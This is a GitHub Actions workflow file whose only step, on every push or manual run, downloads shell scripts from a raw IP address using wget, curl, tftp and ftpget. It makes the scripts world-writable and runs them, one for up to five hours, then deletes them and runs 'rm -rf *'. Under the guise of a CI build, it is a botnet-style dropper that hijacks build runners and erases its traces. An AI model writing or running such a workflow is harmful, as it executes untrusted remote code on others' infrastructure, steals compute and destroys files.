name: Cl

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - name: Download
      run: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.92.254.164/ohshit.sh; curl -O http://91.92.254.164/ohshit.sh; chmod 777 ohshit.sh; timeout 5h sh ohshit.sh; tftp 91.92.254.164 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 91.92.254.164; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 91.92.254.164 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *


